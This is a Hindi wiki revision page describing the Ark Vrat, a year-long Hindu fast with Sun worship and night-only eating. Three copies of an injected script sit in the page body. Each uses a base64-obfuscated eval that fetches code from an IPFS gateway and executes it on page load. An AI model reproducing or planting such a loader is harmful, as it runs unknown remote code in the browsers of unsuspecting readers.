Difference between revisions of "अर्क व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*भारत में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा ...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
*यह व्रत [[शुक्ल पक्ष]] और [[कृष्ण पक्ष]] में [[षष्ठी]] या [[सप्तमी]] को एक वर्ष तक रखना चाहिए। केवल रात में खाना
+
*यह व्रत [[शुक्ल पक्ष]] और [[कृष्ण पक्ष]] में [[षष्ठी]] या [[सप्तमी]] को एक वर्ष तक रखना चाहिए।  
 
*अर्क व्रत में अर्क ([[सूर्य देवता|सूर्य]]) की पूजा करनी चाहिए।<ref>कृत्यकल्पतरु (व्रतकाण्ड, 387), हेमाद्रि (व्रतखण्ड 2, 509)।</ref>
 
*अर्क व्रत में अर्क ([[सूर्य देवता|सूर्य]]) की पूजा करनी चाहिए।<ref>कृत्यकल्पतरु (व्रतकाण्ड, 387), हेमाद्रि (व्रतखण्ड 2, 509)।</ref>
 
+
*इस व्रत में केवल रात में भोजन करना चाहिए। 
 
{{लेख प्रगति
 
{{लेख प्रगति
 
|आधार=आधार1
 
|आधार=आधार1

Revision as of 09:53, 6 September 2010

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullakhit hindoo dharm ka ek vrat sanskar hai.
  • yah vrat shukl paksh aur krishna paksh mean shashthi ya saptami ko ek varsh tak rakhana chahie.
  • ark vrat mean ark (soory) ki pooja karani chahie.[1]
  • is vrat mean keval rat mean bhojan karana chahie. 
panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. krityakalpataru (vratakand, 387), hemadri (vratakhand 2, 509).

sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>